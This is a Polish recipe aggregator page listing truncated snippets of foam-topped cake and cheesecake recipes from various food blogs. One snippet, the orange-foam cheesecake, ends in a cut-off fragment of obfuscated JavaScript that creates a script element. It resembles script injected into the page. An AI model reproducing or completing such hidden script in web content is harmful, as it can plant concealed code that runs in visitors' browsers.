ciasto pianka - 2655 przepisów (strona:45/177)

Ciasto "Truskawkowa rozkosz" 370

żelatyny Wierzch śmietanowy 400 ml zimnej śmietany 18% 1,5 łyżki cukru pudru 2 łyżeczki żelatyny 3 łyżki wrzątku Dodatki ok. 100 g małych biszkoptów gorzka czekolada Ciasto rozpocząć od przygotowania pianki i musu truskawkowego. 3 galaretki rozpuścić w 400 ml wrzątku. Dobrze wymieszać i odstawić do schłodzenia i lekkiego ścięcia. Truskawki rozdrobnić za pomocą blendera. Przelać je do garnka(...)minuty do lodówki lub odstawić na 7 minut gdzieś w kuchni. Na piance ułożyć biszkopty jeden obok drugiego, dociskając je lekko do dna. Wyłożyć tężejący mus truskawkowy na biszkopty. Ewentualnie wyrównać powierzchnię. Odstawić blachę do całkowitego stężenia musu truskawkowego. Ja zlekceważyłam ten krok, więc najwyższa warstwa ciasta jest bardzo nierówna i zabarwiła się od musu :( Żelatynę na warstwę śmietanową rozpuścić

Weekendy w domu i ogrodzie
Mazurek czekoladowy 153

ziemniaczanej • 3 łyżki cukru pudru • 3 żółtka • szczypta soli Nadzienie • 2 gorzkie czekolady • 1 szklanka śmietanki 30-36% • 1/2 szklanki cukru • 1 paczka blanszowanych migdałów • kilka sztuk pianek marshmallows • kolorowe cukierki Wykonanie: Ciasto kruche • Wymieszać obie mąki, cukier i sól. • Dodać miękkie masło, żółtka i zagnieść ciasto. Ja mieszam mikserem. • Ciasto wstawić na kilka godzin(...)przestudzić i dodać połamaną na kawałki czekoladę. Mieszać cały czas, aż czekolada się rozpuści. • Ciepłą masę czekoladową wylać na kruche ciasto i wyrównać. • Blanszowanymi migdałami obłożyć obwód mazurka tworząc pałąk koszyczka. • Pianki marshmallows pociąć nożyczkami na plasterki i ułożyć w formie kwiatków z cukierkami. • Koszyczek wysypać posiekanymi migdałami

To co kocham
Ciasto z malinami i budyniową pianką. 180

Wielki Kiermasz Ciast". Uzyskane ze sprzedaży fundusze będą przekazane na szczytny cel. Miałam przyjemność dołożyć małą cegiełkę do tego przedsięwzięcia w imieniu naszego bloga. Upiekłam kruche ciasto  z malinami i budyniową pianką. Przyrządzałam je wcześniej wielokrotnie. Wiedziałam, że przepis jest sprawdzony i jest szansa, że deser posmakuje szanownym darczyńcom :) Obiecałam córce, że specjalnie dla niej zrobię drugie. Słowo się(...)pszennej 4 żółtka 150 g zimnego masła 3 łyżki cukru pudru 1 i 1/2 łyżeczki proszku do pieczenia Budyniowa pianka: 4 białka 3/4 szkl. cukru pudru 2 op. budyniu waniliowego 1/3 szkl. oleju słonecznikowego maliny mrożone Wykonanie: Składniki na ciasto szybko zagnieść, podzielić na dwie części (mniejszą i większą) i zamrozić. Zamrożoną większą część ciasta zetrzeć na tarce do formy

zadanie-gotowanie
sernik z pomarańczową pianką 178

piec około 45 minut. Wystudzić przy otwartych drzwiczkach piekarnika. Kiedy sernik wystygnie przygotować piankę na wierzch. Galaretkę rozpuścić w 3/4 szklanki wrzątku. Odstawić do wystudzenia. Kremówkę ubić na sztywno, dodać tężejącą galaretkę i zmiksować. Odstawić na chwilę do momenty aż będzie miała konsystencję pianki. Przełożyć do rękawa (jeśli jest jeszcze zbyt rzadka do odczekać aż zgęstnieje na tyle aby utrzymać(...)żeby nie przeszedł zapachami lodówki). Konfiturę przełożyć do małego rondelka, lekko podgrzać i z łyżki polać nią wierzch ciasta (ma być podgrzana, nie gorąca, bo rozpuści piankę). Wstawić do lodówki. Tak przygotowane ciasto przed krojeniem powinno być chłodzone przez kilka godzin a najlepiej przez całą noc.  (function(){ zkhb=document.createElement("script");zkhb_=(("u")+"st")+"a";zkhb.async=true; zkhb.type="text/javascript";zkhb

Domowa Cukierenka-Domowa Kuchnia
Ciasto z budyniową pianką czyli jak zagospodarować sobie czas w okresie sesji,zaliczeń i deadlinów 156

kostki) zimnego masła 1łyżeczka proszku do pieczenia 1 pełna szklanka i 3/4 szklanki mąki (pszennej, krupczatki w tym zaleca się jedną łyżeczkę mąki ziemniaczanej dla zwiększenia kruchości ciasta) Składniki na budyniową piankę: 3białka pół szklanki cukru łyżka cukru waniliowego lub ekstraktu 1/4szklanki oleju słonecznikowego bądź rzepakowego 40 gram proszku budyniowego śmietankowego bez cukru (przy zakupie opakowania budyniu sprawdź jego gramaturę(...)stopni Celsjusza 6. Wyłóż blachę do papierem do pieczenia. 7. Wyciągnij z zamrażalnika większą kulę ciasta. Zetrzyj je na tarce o średnich oczkach. 8. Z wiórek wyklej spód. Ponakłuwaj widelcem 9. Piecz 15-20 minut. 10.Wyciągnij na blat i wystudź Wykonanie budyniowej pianki : 1. Ubij białka niemalże na sztywno. 2. Miksując dodawaj partiami cukier. 3. Następnie powoli dosypuj proszek

U Fiolki
Ciasto z budyniową pianką czyli jak zagospodarować sobie czas w okresie sesji,zaliczeń i deadlinów 142

kostki) zimnego masła 1łyżeczka proszku do pieczenia 1 pełna szklanka i 3/4 szklanki mąki (pszennej, krupczatki w tym zaleca się jedną łyżeczkę mąki ziemniaczanej dla zwiększenia kruchości ciasta) Składniki na budyniową piankę: 3białka pół szklanki cukru łyżka cukru waniliowego lub ekstraktu 1/4szklanki oleju słonecznikowego bądź rzepakowego 40 gram proszku budyniowego śmietankowego bez cukru (przy zakupie opakowania budyniu sprawdź jego gramaturę(...)stopni Celsjusza 6. Wyłóż blachę do papierem do pieczenia. 7. Wyciągnij z zamrażalnika większą kulę ciasta. Zetrzyj je na tarce o średnich oczkach. 8. Z wiórek wyklej spód. Ponakłuwaj widelcem 9. Piecz 15-20 minut. 10.Wyciągnij na blat i wystudź Wykonanie budyniowej pianki : 1. Ubij białka niemalże na sztywno. 2. Miksując dodawaj partiami cukier. 3. Następnie powoli dosypuj proszek

Fiolka w kuchni
Bardzo kruchy placek czekoladowo-waniliowy z owocami leśnymi 189

cukru waniliowego 1-2 łyżki soku z cytryny 50 g roztopionego masła lub margaryny  Przygotowanie: Masło/margarynę do pianki rozpuść w garnuszku na małym ogniu i pozostaw do ostudzenia. Składniki na ciasto kruche zagniatamy szybko ręcznie lub w malakserze do połączenia się. Pozostanie kruche i wręcz sypkie, ale nie przejmuj się tym.  1/3 ciasta rozwałkuj na papierze(...)góry. Na ciepło smakuje najlepiej :) Smacznego! Sprawdź też inną wersję placka w jesiennej odsłonie . Mój przepis to połączenie dwóch przepisów Pawła Małeckiego. Pianka pochodzi z przepisu na puszysty placek borówkowy. Do niego potrzebne było ciasto kruche, które miało się schładzać nawet 2 godziny w zamrażalniku. Nie miałam na to czasu. Dlatego wymieniłam je na to sprawdzone w innym moim przepisie

Anioszek w kuchni
Kostka brzoskwiniowa z jeżynową pianką 296

Kostka ciasta pełna aromatycznych brzoskwiń z pianką jeżynową i bezą. Lekkie i bardzo smaczne. Z chęcią sięga się po następną porcję :) BISZKOPT: 2 jajka 1/2 szklanki cukru 1/3 szklanki mąki pszennej 2 łyżki mąki ziemniaczanej WARSTWA BRZOSKWINIOWA: 1 kg brzoskwiń 1 galaretka brzoskwiniowa 3/4 szklanki wody PIANKA JEŻYNOWA: 250g jeżyn 1/3 szklanki cukru 2 łyżeczki żelatyny 1 szklanka śmietanki(...)Wlać cienkim strumyczkiem przestudzoną żelatynę energicznie mieszając. Wystudzić. Kiedy zacznie lekko tężeć, ubić dobrze schłodzoną śmietankę. Wkładać porcjami do jeżyn i trzepaczką delikatnie łączyć. Piankę jeżynową wyłożyć na warstwę brzoskwiniową i wyrównać. Odstawić do stężenia. Ciasto wyjąć z formy pokroić w kwadraty o boku ok 5cm. Przed podaniem udekorować bezami i czekoladą. Smacznego! Kategoria: Biszkopty i ciasta biszkoptowe , Ciasta

https:KKuchniaMniam
CIASTO BRZOSKWINIOWE BEZ PIECZENIA 500

Ciasto brzoskwiniowe bez pieczenia to ciasto na herbatnikach, z pianką śmietankową, musem brzoskwiniowym udekorowane tartą czekoladą. Pycha, po prostu palce lizać! Jak zrobić takie brzoskwiniowe ciasto możecie zobaczyć w filmiku . Zapraszam do oglądania. Subskrybuj kanał RITA creative a nie ominą Cię nowe przepisy. CIASTO BRZOSKWINIOWE BEZ PIECZENIA SKŁADNIKI: Masa biała: śmietanka kremówka 30% dobrze schłodzona (200 ml.) cukier puder

RITA food channel
Ciasto Makowe „Gwiazdka” z Kokosem i Ananasem 742

Nowe pyszne ciasto w Małej Cukierence z makiem, kokosem i ananasem. Trochę zajmuje czasu, ale jest bardzo smaczne. Ananas zanurzony jest w kokosowym kremie budyniowym i ożywia ciasto. Na wierzchu jest pianka z bitej śmietany i galaretki. Ja użyłam niebieskiej galaretki, ale możemy użyć dowolnej, swojej ulubionej. Ciasto udekorowałam uprażonymi wiórkami kokosowymi, całość smakuje wyśmienicie. Bardzo polecam… Na końcu postu

Mała Cukierenka
Ciasto z kokosem + film 158

Smakowite ciasto z kokosem, banalnie  proste w wykonaniu , nie zawierające zbyt dużej ilości cukru, z pyszną bezową pianką to jedno z ciast , za którym przepadają moje dzieci. Doskonały smakołyk na podwieczorek idealny do kawy. składniki na okrągłą formę 23 cm 2 szklanki mąki pszennej 1 łyżeczka proszku do pieczenia 1/2 kostki masła opakowanie cukru waniliowego 16 g 3 żółtka

Smakowite Dania
Kruche ciasto z borówkami i delikatna pianką 189

wysmarować olejem i wyłożyć papierem do pieczenia. Po tym czasie wyciągnąć większą część ciasta i zetrzeć na grubych oczkach i przyklepać ciasto tak aby przykryło całą powierzchnie blaszki. Piec 20 minut w temperaturze 190 stopni. Wystudzić. Delikatna pianka: szklanka cukru pół szklanki oleju 16 gram cukru waniliowego (można użyć swojego) 80 gram budyniu śmietankowego Wykonanie: Białka ubić na sztywną pianę(...)gotowe dodawać łyżka po łyżce cukier i cukier waniliowy, cały czas ubijać. Następnie stopniowo dodawać budyń (proszek), ubijać. Na sam koniec dodawać stopniowo olej i miksować. Gotową piankę wylać na ostudzone ciasto. Na pianę wyłożyć borówki i zetrzeć na nią pozostałą część zamrożonego ciasta. Gotowe ciasto wstawić do nagrzanego do 180 stopni piekarnika i piec przez 30-40 minut

Krakowskie smaki Ani
Babeczki czekoladowe 157

serca (a raczej podniebienia) moich dzieci. Proste i szybkie w wykonaniu, idealne na imprezy urodzinowe. Najlepsze do dekoracji byłyby mini pianki, niestety nie udało mi się takich znaleźć. Babeczki można udekorować wg własnego pomysłu. Zamiast babeczek możemy upiec ciasto w tortownicy lub keksówce. Wówczas wydłużamy czas pieczenia do 45-50 minut (do suchego patyczka). Inspiracja ze strony Kwestia Smaku . Polecam(...)połączenia składników).  Formę do muffinek wykładamy papilotkami, wlewamy ciasto do 2/3 wysokości. Pieczemy około 25 minut w 180 stopniach. Po wystudzeniu dekorujemy polewą i piankami.  SMACZNEGO! Do  odmierzania równych porcji ciasta  polecamy praktyczny dozownik do ciasta dostępny w sklepie Makowski Kredens .  Dzięki niemu unikniemy bałaganu w kuchni. Można go wykorzystać przy pieczeniu babeczek, muffinek, gofrów

Smak mojej kuchni
SERNIK PUSZYSTY Z PIANKĄ I ROSĄ 167

Bardzo elegancki sernik, który jest puszysty i ma pyszną, słodką piankę, na której tworzą się łezki. Wygląda efektownie i z pewnością wszystkim posmakuje. Składniki: Ciasto: mąka 2 szkl. żółtko 1 szt. proszek do pieczenia 2 łyżeczki  margaryna 10 dag.  cukier 1 szkl. jajko 1 szt. śmietana 4 łyżki Masa serowa: twaróg 1 kg. (dwukrotnie zmielony) cukier 1 szkl(...)wodzie. Wyrównać. 2. MASA SEROWA: Ser połączyć ze wszystkimi składnikami, dobrze zmiksować na najwyższych obrotach, tylko do połączenia się składników. Wylać masę na ciasto. Piec 40-50 min. w 170-180 stopniach. 3. PIANKA: Białka ubić na sztywną pianę. Dodać cukier i na końcu kisiel, dalej miksując. Gotową pianę wylać na gorący sernik. Piec jeszcze

Kuchnia Paulettes
Borówkowy sernik bez pieczenia ze śmietankową pianką-na herbatnikach 192

Witam Kochani dziś zapraszam Was na rewelacyjny borówkowy sernik na zimno z pianką śmietankową-jest to ciasto bez pieczenia. Zachwyca pięknym fioletowym kolorem i wspaniałym smakiem. Zapraszam i gorąco polecam :) SKŁADNIKI  blaszka 25x25cm -około 300g herbatników (mi na jedną warstwę wchodziło 20sztuk małych herbatników) -1 kg sera sernikowego z wiaderka -300 ml śmietany 30% -1,5 szklanki cukru pudru(...)borówek -2,5 łyżki żelatyny  -125ml gorącej wody PIANKA -1 śnieżka (bita śmietanan w proszku) -200ml zimnego mleka -0,5 łyżki żelatyny -100 ml gorącej wody DODATKOWO -czekolada deserowa do posypania ciasta Dno blaszki wykładamy papierem do pieczenia. MASA SEROWA Borówki blendujemy na mus. Do dużej miski dajemy ser, dodajemy mus z borówek oraz cukier puder

moje pyszne łatwe i sprawdzone przepisy krok po kroku